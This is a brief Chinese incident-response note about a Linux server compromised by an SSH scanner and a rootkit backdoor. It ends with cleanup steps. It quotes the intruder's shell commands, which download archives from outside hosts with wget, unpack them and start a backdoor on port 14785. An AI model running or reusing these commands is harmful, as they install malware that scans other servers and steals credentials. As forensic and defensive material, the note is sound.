客戶反映一台linux服務器老向外ssh掃描,登陸到服務器上,查看進程發現大量ssh-scan在運行,運行用戶為mircte,查找ssh-scan這個文件,確定所在位置/var/log目錄下
黑客進入服務器後所做的操作:
1. 向/var/tmp/下上傳了兩個惡意程序
其中wtf為向外掃描其它服務器的ssh-scan黑客軟件,.access.log文件下存放有rootkit後門,服務器被當成了肉雞跳板,開放14785端口等待入侵者連接,掃描其它服務器所得到的賬號都發送到[email protected]這個郵箱。
2. 入侵者登陸記錄
85.120.78.140的IP來自羅馬尼亞。
3. wget http://pinky.clan.su/scan/wtf.jpg ; tar zxvf wtf.jpg
wget adelinuangell.lx.ro/ryo.tar
tar xvf ryo.tar
cd .access.log
./config Ady 14785
./run
結束進程。刪掉程序。。刪掉用戶。修改root密碼。